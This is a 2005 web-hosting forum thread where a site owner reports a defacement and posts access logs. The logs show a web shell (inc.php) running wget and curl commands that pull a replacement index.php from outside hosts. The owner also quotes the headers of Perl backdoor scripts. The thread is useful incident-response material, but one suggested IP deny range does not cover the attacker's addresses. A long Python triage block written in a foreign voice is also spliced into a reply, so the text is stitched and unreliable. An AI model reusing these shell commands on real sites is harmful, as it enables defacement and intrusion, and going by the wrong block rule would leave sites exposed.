Ravens PHP Scripts: Forums
 

 

ring_c
Involved



Joined: Dec 28, 2003
Posts: 276
Location: Israel

Posted: Thu Sep 29, 2005 8:16 am

Ok, this time they've really made me angry! Someone has reset my index.php. No other harm, just left me with a 0 bytes file!

Grrrrrrr... that really got to me.
Ok, I've started investigating. Using Sentinel's (thanks guys, you're great!) tracked IP, I've found the hacker's IP, matching it to the time the file was last changed.

This is a Brazilian team. The IP was 200.232.181.49.

Ok. Now I had to go through a 670 MB raw log file to find out what they've done! Geee... 670 MB???

First of all, I went on a search for an editor which can handle this kind of size. I found one called Programmer's File Editor from 1999 (if you have a more recent one, tell me, though this one handles it pretty well).

Ok now... here's the log file, with all entries of this IP address (including another Brazilian IP I've found in the same time frame, just in case):

Code:
200.232.181.49 - - [28/Sep/2005:21:19:22 -0400] "GET /modules/drk.php HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.232.181.49 - - [28/Sep/2005:21:19:32 -0400] "POST /modules/SPChat/smileyupload.php HTTP/1.1" 200 1728 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:33 -0400] "GET /modules/inc.php HTTP/1.1" 200 2481 "http://www.hagigim.com/modules/SPChat/smileyupload.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:39 -0400] "GET /modules/inc.php HTTP/1.1" 200 4290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:46 -0400] "POST /modules/inc.php HTTP/1.1" 200 5411 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:15 -0400] "POST /modules/inc.php HTTP/1.1" 200 4526 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:26 -0400] "GET / HTTP/1.1" 200 16172 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:26 -0400] "GET /themes/phpib2/style/style.css HTTP/1.1" 200 3184 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /images/banners/10%20facts%20of%20marriage.gif HTTP/1.1" 200 6527 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/head_bg.gif HTTP/1.1" 200 641 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/logo_original.jpg HTTP/1.1" 200 27299 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/cellpic1.gif HTTP/1.1" 200 99 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:28 -0400] "GET /themes/phpib2/images/7px.gif HTTP/1.1" 200 817 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:28 -0400] "GET /themes/phpib2/images/pixel.gif HTTP/1.1" 200 49 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /themes/phpib2/images/nav.gif HTTP/1.1" 200 828 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /themes/phpib2/images/cellpic3.gif HTTP/1.1" 200 101 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /images/calender.jpg HTTP/1.1" 200 482 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /images/rss.gif HTTP/1.1" 200 728 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /modules/Forums/images/avatars/blank.gif HTTP/1.1" 200 7639 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/ball_r.gif HTTP/1.1" 200 191 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/ball_g.gif HTTP/1.1" 200 193 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/group.gif HTTP/1.1" 200 989 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/guest.gif HTTP/1.1" 200 889 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/spacer.gif HTTP/1.1" 200 89 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/space.gif HTTP/1.1" 200 91 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/userprofil.gif HTTP/1.1" 200 891 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/member.gif HTTP/1.1" 200 887 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/blocks/admin.gif HTTP/1.1" 200 886 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/blocks/gold.gif HTTP/1.1" 200 894 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/topics/dati.gif HTTP/1.1" 200 3533 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/topics/hagigim.gif HTTP/1.1" 200 3713 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:37 -0400] "GET /modules/inc.php?work_dir=/&command=wget+200.141.152.173%2Findex.php HTTP/1.1" 200 1786 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:43 -0400] "POST /modules/inc.php HTTP/1.1" 200 1349 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=wget+200.141.152.173%2Findex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:47 -0400] "POST /modules/inc.php HTTP/1.1" 200 151780 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:50 -0400] "POST /modules/inc.php HTTP/1.1" 200 1458 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:57 -0400] "POST /modules/inc.php HTTP/1.1" 200 1400 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:03 -0400] "POST /modules/inc.php HTTP/1.1" 200 1419 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:20 -0400] "POST /modules/inc.php HTTP/1.1" 200 1503 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:24 -0400] "POST /modules/inc.php HTTP/1.1" 200 152709 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:26 -0400] "POST /modules/inc.php HTTP/1.1" 200 1386 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:48 -0400] "POST /modules/inc.php HTTP/1.1" 200 4621 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:53 -0400] "POST /modules/inc.php HTTP/1.1" 200 4677 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:23 -0400] "GET / HTTP/1.1" 200 15983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/logo_original.jpg HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/style/style.css HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /images/banners/10%20facts%20of%20marriage.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/cellpic1.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/head_bg.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/7px.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/pixel.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/nav.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/cellpic3.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /images/calender.jpg HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /images/rss.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:26 -0400] "GET /modules/Forums/images/avatars/blank.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:26 -0400] "GET /images/blocks/ball_g.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:39 -0400] "POST /modules/inc.php HTTP/1.1" 200 4567 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:45 -0400] "GET / HTTP/1.1" 200 30 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:23:25 -0400] "POST /modules/inc.php HTTP/1.1" 200 4755 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:23:29 -0400] "GET / HTTP/1.1" 200 1232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:26:10 -0400] "GET / HTTP/1.1" 200 1232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:39 -0400] "POST /modules/inc.php HTTP/1.1" 200 4699 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:41 -0400] "POST /modules/inc.php HTTP/1.1" 200 4734 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:52 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:55 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:56 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:06 -0400] "POST /modules/inc.php HTTP/1.1" 200 4741 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:14 -0400] "POST /modules/inc.php HTTP/1.1" 200 4626 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:18 -0400] "POST /modules/inc.php HTTP/1.1" 200 4633 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:23 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.233.139.36 - - [28/Sep/2005:21:31:56 -0400] "GET /modules/inc.php HTTP/1.1" 200 4304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:31:57 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:03 -0400] "POST /modules/inc.php HTTP/1.1" 200 4555 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:04 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:08 -0400] "POST /modules/inc.php HTTP/1.1" 200 4940 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:08 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:12 -0400] "POST /modules/inc.php HTTP/1.1" 200 4838 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:13 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.232.181.49 - - [28/Sep/2005:21:40:35 -0400] "POST /modules/SPChat/smileyupload.php HTTP/1.1" 200 1728 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:35 -0400] "GET /modules/inc.php HTTP/1.1" 200 4199 "http://www.hagigim.com/modules/SPChat/smileyupload.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:46 -0400] "GET /modules/inc.php HTTP/1.1" 200 4192 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:48 -0400] "GET /modules/inc.php?work_dir=/&command= HTTP/1.1" 200 1709 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:50 -0400] "POST /modules/inc.php HTTP/1.1" 200 1861 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:58 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:10 -0400] "POST /modules/inc.php HTTP/1.1" 200 1857 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:18 -0400] "GET /modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php HTTP/1.1" 200 1892 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:21 -0400] "GET /modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php HTTP/1.1" 200 1850 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.233.139.36 - - [28/Sep/2005:23:04:15 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:23:04:18 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"


You can see they've used some backdoor in SPChat, which lets you upload files. The filename is smileyupload.php, and it can be found in \modules\SPChat\

Also, I've found two .txt files in my root, uploaded today, which look like Perl hacking scripts.

Here's the one called dc.txt:
Code:
#!/usr/bin/perl

use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";

print "[*] Datached\n\n";


And here's the one called own.txt:
Code:
#!/usr/bin/perl

# Telnet-like Standard Daemon 0.7
#
#    0ldW0lf - [ Only registered users can see links on this board! Get registered or login! ]
#            - [ Only registered users can see links on this board! Get registered or login! ]
#            - [ Only registered users can see links on this board! Get registered or login! ]
#            - [ Only registered users can see links on this board! Get registered or login! ]
#
#  For those guys that still like to open ports
#  and use non-rooted boxes
#
#  This has been developed to join in the TocToc
#  project code, now it's done and I'm distributing
#  this separated
#
#  This one i made without IO::Pty so it uses
#  only standard modules... enjoy it
#
#  tested on linux boxes.. probably will work fine on others
#  any problem... #atrix@irc.brasnet.org
#


Now, first I think it should be recommended to remove SPChat's smileyupload.php file. Then, regarding the other files and the log: it's beyond my capabilities. Maybe you guys can figure something out of this.

FYI.


Edited by Raven for security reasons
 
hitwalker
Sells PC To Pay For Divorce



Posts: 5661

Posted: Thu Sep 29, 2005 8:40 am

Nice, such a fat log..
Anyway....
SPChat does have a few vulnerabilities.

And that was a simple search..
You shouldn't leave any "upload capable" files on your server..
However, I do have doubts they did this..
Cause you must have some rights or access to do any damage..
And using a search like "vulnerabilities SPChat" gives 1800 results in that.
Nice chat..
 
ring_c







Posted: Thu Sep 29, 2005 8:49 am

Gees... would you suggest completely removing SPChat?
 
hitwalker







Posted: Thu Sep 29, 2005 2:15 pm

Well, let's not debate if SPChat is vulnerable or not.
You do believe someone abused SPChat.
There are other chat scripts out there you can use.
 
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

Posted: Thu Sep 29, 2005 3:49 pm

deny from 200.0.0.0/10

That will deny from 200.0.0.0 - 200.63.255.255

I receive over 3 million bytes per day from that IP range that drops into the bit-bucket. Of course I drop it at the kernel level so it never goes anywhere - it doesn't affect the web server that way ROTFL

If you have root access on your server and use APF, just use this command
Code:
/PATH/TO/APF/apf -d 200.0.0.0/10 #brazil kiddies


If you don't use APF but have IPTABLES installed, use
Code:
iptables -I INPUT -s 200.0.0.0/10  -j DROP
 
ring_c







Posted: Sat Oct 01, 2005 12:39 pm

Thanks, Raven, but I do not have access to my server's root, so I've tried using your deny line in my .htaccess. Actually, I tried posting it here so I could get your confirmation, but I was banned somehow by Sentinel, and I don't want to be rebanned, so I'll have to trust my instincts.
 
Susann
Moderator



Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

Posted: Sat Oct 01, 2005 1:00 pm

I have also tried to post my htaccess some days before.

Your instinct is probably better than mine; in other words, prevention is better than cure. But deny is easy, it's only one line.
 
Raven







Posted: Sat Oct 01, 2005 1:05 pm

ring_c wrote:
Thanks, Raven, but I do not have access to my server's root, so I've tried using your deny line in my .htaccess. Actually, I tried posting it here so I could get your confirmation, but I was banned somehow by Sentinel, and I don't want to be rebanned, so I'll have to trust my instincts.
That will handle it.
 
ring_c







Posted: Sat Oct 01, 2005 1:36 pm

Raven, that's a part of my .htaccess:

<Limit GET PUT POST>
Order Allow,Deny
deny from 200.0.0.0/10
Allow from all
</Limit>

is that ok?
 
Susann







Posted: Sat Oct 01, 2005 1:45 pm

Your htaccess is OK. For example, that's my part of this.

<Limit GET PUT POST>
Order Allow,Deny
Deny from 217.67.244.02
Deny from 211.157.8.41
Allow from all
</Limit>

Btw, have you ever heard of grep? It's a tool for logfile analysis. I got this tip from my other forum. Maybe it's interesting for you too. But I have not checked it.
 
ring_c







Posted: Sat Oct 01, 2005 1:56 pm

I've just googled it and found it to be some Unix/Linux tool.
Will it handle large log files like mine (over 500 MB)?

Also, the reason my logfile is so long is that I have Site Messenger, which refreshes itself for new messages every 2000 ms or so. Is there a way to make it not be recorded?
 
Raven







Posted: Sat Oct 01, 2005 1:57 pm

grep is standard Unix from way back. You have to be logged into your server via SSH to use it.
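The log triage this thread does by hand (pulling one IP's requests out of a large access log, spotting the requests that drive an uploaded command shell, noticing the front page collapsing to a few bytes) plus the deny-range question from Raven's and Susann's posts, as one added Python example; this is not code from the forum, from NukeSentinel or from APF. The sample input is a constructed list of shortened lines taken from the log quoted above, and the indicator keywords and the 1% size-collapse threshold are my own heuristics, not anything the thread specifies.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample input: lines from the access log quoted in the thread, user agents shortened.
SAMPLE_LOG = [
    '200.232.181.49 - - [28/Sep/2005:21:19:22 -0400] "GET /modules/drk.php HTTP/1.1" 404 4173 "-" "Mozilla/4.0"',
    '200.232.181.49 - - [28/Sep/2005:21:19:32 -0400] "POST /modules/SPChat/smileyupload.php HTTP/1.1" 200 1728 "-" "Mozilla/4.0"',
    '200.232.181.49 - - [28/Sep/2005:21:19:33 -0400] "GET /modules/inc.php HTTP/1.1" 200 2481 "http://www.hagigim.com/modules/SPChat/smileyupload.php" "Mozilla/4.0"',
    '200.232.181.49 - - [28/Sep/2005:21:20:26 -0400] "GET / HTTP/1.1" 200 16172 "-" "Mozilla/4.0"',
    '200.232.181.49 - - [28/Sep/2005:21:20:37 -0400] "GET /modules/inc.php?work_dir=/&command=wget+200.141.152.173%2Findex.php HTTP/1.1" 200 1786 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0"',
    '200.232.181.49 - - [28/Sep/2005:21:28:52 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0"',
    '200.232.181.49 - - [28/Sep/2005:21:41:18 -0400] "GET /modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php HTTP/1.1" 200 1892 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0"',
    '200.233.139.36 - - [28/Sep/2005:21:31:56 -0400] "GET /modules/inc.php HTTP/1.1" 200 4304 "-" "Mozilla/5.0"',
]

SHELL_PARAMS = {"command", "cmd", "work_dir"}    # query keys typical of PHP command shells (heuristic)
FETCH_TOOLS = ("wget", "curl", "fetch", "lynx")  # tools used to pull a second stage onto the box

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["status"] = int(e["status"])
    e["size"] = 0 if e["size"] == "-" else int(e["size"])
    return e

def indicators(e, baseline):
    """Indicators firing for one entry; baseline maps path -> largest 200 response seen for it."""
    reasons = []
    parts = urlsplit(e["target"])
    query = unquote_plus(parts.query).lower()          # decode %2F, %3E and '+' before matching
    for key in sorted(SHELL_PARAMS & set(parse_qs(parts.query, keep_blank_values=True))):
        reasons.append(f"shell parameter '{key}=' in query")
    for tool in FETCH_TOOLS:
        if re.search(rf"\b{tool}\b", query):
            reasons.append(f"download tool '{tool}' in query")
    if ">" in query:
        reasons.append("shell redirection in query")
    if e["method"] == "POST" and "upload" in parts.path.lower():
        reasons.append("POST to an upload endpoint")
    if "upload" in e["referer"].lower():
        reasons.append("reached from an upload endpoint")
    big = baseline.get(parts.path, 0)
    if e["status"] == 200 and big and e["size"] < big / 100:   # page suddenly near-empty (defaced/reset)
        reasons.append(f"response for {parts.path} shrank to {e['size']} bytes (was {big})")
    return reasons

def triage(lines, suspect_ips):
    """Return [(timestamp, method, target, reasons)] for flagged requests from suspect_ips."""
    entries = [e for e in map(parse_line, lines) if e and e["ip"] in suspect_ips]
    baseline = {}  # path -> largest 200 response, taken as the normal size of that page
    for e in entries:
        if e["status"] == 200:
            path = urlsplit(e["target"]).path
            baseline[path] = max(baseline.get(path, 0), e["size"])
    return [(e["ts"], e["method"], e["target"], r) for e in entries if (r := indicators(e, baseline))]

def cidr_coverage(cidr, ips):
    """Which observed addresses does a 'deny from <cidr>' rule actually contain?
    200.0.0.0/10 spans 200.0.0.0-200.63.255.255 (second octet 0-63), so an address such as
    200.232.181.49 is outside it even though both start with 200."""
    net = ipaddress.ip_network(cidr, strict=False)
    return {ip: ipaddress.ip_address(ip) in net for ip in ips}

def covering_network(ip, prefixlen):
    """The prefixlen-sized block that does contain ip, for checking or correcting a deny rule."""
    return str(ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False))
```

Checking that a deny rule covers the observed addresses before relying on it is the point of `cidr_coverage`: 200.0.0.0/10 spans 200.0.0.0 to 200.63.255.255, and none of the three addresses in this log fall inside it.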
 
JediAaron
New Member



Joined: Apr 12, 2006
Posts: 11

Posted: Tue Jul 11, 2006 8:09 am

